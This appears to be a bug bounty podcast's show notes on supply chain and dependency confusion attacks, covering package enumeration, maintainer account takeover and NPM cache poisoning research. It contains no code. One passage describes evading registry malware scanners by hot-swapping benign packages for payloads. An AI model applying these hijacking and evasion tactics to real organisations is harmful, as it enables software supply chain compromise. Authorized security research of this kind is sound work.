Critical Thinking - Bug Bounty Podcast
Posts
[HackerNotes Ep. 74] Supply Chain Attack Primer - Popping RCE Without an HTTP Request

[HackerNotes Ep. 74] Supply Chain Attack Primer - Popping RCE Without an HTTP Request

Check out all things supply chain and dependency confusion below.

gr3pme
June 08, 2024

Hacker TLDR;

Depi: Lupin and his team have been doing extensive research in the realm of supply chain security. This bred a new tool, Depi, targeted at organisations looking to up their supply chain security. It’s not publicly available yet, but you can check out the tool and research from the team here: https://www.landh.tech/depi/
Supply Chain & Dependancy Confusion Attacks: At a high level, the supply chain attack surface can be broken down into 3 main phases. These phases and their associated threats are:
- Source: Submitting unauthorised changes, compromising source repo, building from modified source.
- Build: Using a compromised dependency.
- Package: Compromise of a build process, Uploading a modified package, compromise package registry and using a compromise package. We dive into all of these below.
Dependency & CI/CD Research:
- Original Dependency Confusion Research: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
- GitHub Actions Research: https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/
- GitHub Actions Research: https://medium.com/tinder/exploiting-github-actions-on-open-source-projects-5d93936d189f
- NPM Cache Poisoning: https://www.landh.tech/blog/20240603-npm-cache-poisoning/
Enumerating Packages: Enumerating the packages an application uses is the first step in identifying dependency confusion. Some ways to enumerate these are via:
- Artifactory files: Checking for package.json, requirements.txt and all other associated files in publicly accessible repos of the target.
- Fuzzing: Files such as package.json or requirements.txt are often left accessible in the webroot of an app. Adding these to your quick hits wordlist can provide some solid leads.
- Git history: Searching through the Git history through all of the commits can reveal old files and packages which may be forgotten about but still used. A tool to help do this: https://github.com/tomnomnom/dotfiles/blob/master/scripts/git-dump
- Public Repo Search: Searching for unique strings associated with your target such as microservice names, hostnames of any internal artifactory enumerated, or using searches such as package-lock.json <artificatory name> can reveal publicly accessible files on GitHub.

Depi

You might have seen on X but a lot of this research below from Lupin was bred from Depi. Depi is a supply chain analysis tool built for supply chain-based threats, geared primarily towards organisations (so unfortunately no open source tool before anyone asks). If you haven’t checked it out, there’s some cool research from the team over at Depi here: https://www.landh.tech/blog

Depi isn’t released yet but you can join the waiting list if you think it’s something your org might benefit from.

Let's jump into some supply chain hacking!

Supply Chain & Dependancy Confusion Attacks

The goal of dependency confusion is to hijack a package used by the application or codebase you’re looking at. The original research was originally bred from an LHE (live hacking event) by Alex Birsan and can be found here: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610

Now when it comes to packages, there are two ways of publishing a package - a public registry (which is what you’d use when doing a pip install on a personal device for example), or in an artifactory (a private registry). Organizations would use a private registry internally to help manage and publish code to internal developers.

This is where the dependency confusion attacks come in. If a package manager can choose between a package in a public repository with a higher version, or a private repository with a lower version number - which one would the package manager pick? Higher version in public or a lower version in private?

Understanding the attack surface

There are 3 main attack surfaces when understanding supply chain attacks. The source, the build and the package. It can be broken down into the following steps:

https://slsa.dev/

Note: If you’d like to deep dive into the whole supply chain ecosystem, check out this resource: https://slsa.dev/

The source is everything related to the artifactory and registry - thinking JFrog, NPM, Pypi and so on. An artifactory is where all private dependencies are hosted, and where you’d publish all your internal stuff. We also have the (public) registry, which is where the artifactory will pull the public packages from if they do not exist internally.

The build is everything where you’re pulling from a source and building; everything is being pulled from the previous step and dependencies and bundled together. This is also where the CI stuff comes in like GitHub actions, Travis CI and so on.

The package is produced once everything has been built and can be used, and this can be used as a dependency for another build.

There’s been a lot of interesting attacks around the building aspect in the above process. When you think about what's happening in the build process - code being tested, code being built; all of this has to be executed on something and tested somewhere which also means all dependencies, malicious or not are being executed.

Take pushing code to a project as an example, there are often actions or build processes associated with the push to ensure code meets a certain requirement and actually works. This, from an attacker's perspective, allows you to push code and have it executed in one form or another in the context of the project which is why this area can be quite a fruitful patch to hack in.

If you'd like some good research outlining the exploitation of GitHub actions check it out below:

https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/

https://medium.com/tinder/exploiting-github-actions-on-open-source-projects-5d93936d189f

Both pieces of research highlight exactly how the build and test processes in this step of the process can be flipped on their heads and exploited.

One of the big questions, however, is how can we enumerate what packages are being used in the first place?

Enumerating the Scope

Figuring out what packages an app or org uses is naturally the first step in figuring out if we can introduce a malicious package. There are a few different ways to do that, broken down below:

Artifactory files

Anything from files such as package.json, yam.log, requirements.txt and so on can indicate what packages are being used. These can be found on public repos of your target or sometimes even on the target's web apps but more on this shortly.

Fuzzing

Lots of targets expose their webroot which is more often than not where package.json and other related files live - add these files to your quick hits wordlist to make sure you don’t miss an easy win.

Another vector is if the package.json ends up in the front end directly. Somehow some libraries sometimes take the package.json file and uploading in the front end as a string or object. This means you can simply go into the JS, pull all the strings and view all the packages.

Equally, keep a lookout for .map files too - the .map file is a JSON file which includes a source key and the source code. In the source key, you can see all the names of the packages.

Git History

Checking all Git history can be very fruitful. The git-dump tool made by Tomnomnom goes through and pulls every single file that has ever existed in a given repo. Comparing files such as package.json over time can give you an idea of what dependencies might be forgotten about, and in bigger orgs you can almost guarantee there are old builds that are kicking around referencing them.

If any of these older packages are vulnerable and forgotten about, they can still provide a foothold to the target.

One thing to consider here when looking at repos is to check out all the branches. Some bigger and more complex orgs have numerous branches for different versions they support for varying requirements - each of these can have its own set of dependencies specified.

Public Repo Search

If you’ve had luck with any of the prior steps you can also search for package names, microservice names or any unique string that correlates to the infrastructure behind the app you’re attacking on GitHub.

Or, if you have found a private artifactory domain you can search for something like: package-lock.json <artificatory name>

If anything comes up, there’s a very high chance it's from devs from the organisation.

Maintainer attacks

Accounts have to be used to publish and manage these packages regardless of where they live, which also means an additional attack surface against the maintainers. Let’s dive in.

Lapsed Domain

A common behaviour for devs is to have custom domains for their dev work or dedicated projects. With long-standing projects or forgotten-about open-source projects, these custom domains often fall under the radar and aren’t renewed.

Some legacy accounts and smaller repos don’t implement a requirement for 2FA either, so you could just register the domain and log in to the account.

Weak Credentials & Leaked Tokens

Weak credentials on maintainer accounts can be an easy win for a repository compromise, but equally leaked tokens from maintainers’ accounts. We’ve all seen things accidentally get pushed - tokens, SSH keys, DB connection strings - but with some of these projects being open source and maintained privately, sometimes developers can push these kinds of things in other projects accidentally.

Developers also think that once they’ve removed the tokens or sensitive files, they’re safe. This isn’t the case when you combine this with a Git dump tool such as Tomnomnoms above, and you have a lot of data to get through which could contain secrets. Rotating secrets once pushed might also be a lot of work which could be forgotten about ¯\(ツ)/¯

Hosting Packages

Now with all these attacks, how do we get a POC going?

Unfortunately for us, there’s increased security from repositories now which automatically scans and bans any form of new malicious package. A way they get around this at Deppi is via hot swapping. If an automated scanner hits the package, they hot-swap to a benign package. If the customer (defined via an IP range or some other characteristic) hits the package, they hot-swap the package on the fly to include the payload or canary to prove the impact.

Alternatively, you can host a benign package for a week or so to make sure all the automated scanners hit it and give it the green light, and then swap it out after. This comes with its own risks however as a package scanner could technically hit it and ban it at any time.

Exfiltration POC

With a hosted package you need some data to exfil to prove the POC. A good exfil, which will be of no surprise to you red teamers or pen-testers, is via DNS. A lot of HTTP/HTTPS egress filtering is done on some targets, and as you have no way of knowing DNS might be a safer option.

HTTPS exfil is a lot easier to set up in contrast, so take your pick. When it comes to actually proving impact, a safe benign POC would be something like pulling the user and hostname from a machine. Some orgs might not be too happy if you rain a load of shells across their infra, and could cause a lot of unnecessary headaches for their blue team.

Supply Chain Research

Npm Cache Poisoning

When you have packages being pulled millions of times, it makes sense to cache them from a computing perspective. When you take a cache in this instance and poison it, you have the potential to affect millions of builds and that's exactly what Lupin has done in this research:

https://www.landh.tech/blog/20240603-npm-cache-poisoning/

Now this is as big as it comes - NPM itself could be hit, and packages could be poisoned to return a 404 and essentially never work. Think about how popular some packages are and the complexity of some organisations that use them - the availability impact here is huge.

Grafana NPX Confusion

NPX stands for node package execution. Instead of being a manager that installs the package, it will run a binary directly; the primary use case being command-line applications. The interesting thing here is if you use NPX and you do not have the binary locally, it will pull from the public registry and run it.

The confusion comes in. NPX takes a binary name but the public registry supplies package names, ultimately resulting in a confusion on the NPX side. For example, let's say you have grafana-toolkit as the name of the binary. If this didn’t exist locally, NPX would search for it on the repository. The repository doesn’t use this naming convention and uses the format @grafana-toolkit, which means the package didn’t exist.

As it didn’t exist, Lupin claimed the package name which resulted in his malicious package being pulled. The Grafana team also left some positive comments on the research.

Another great episode from the pod this week. Understanding the software supply chain can provide some nice additional attack paths that go outside the standard remit of web app-based hunting, so if your target accepts these types of bugs, keep an eye out for them.

As always, keep hacking!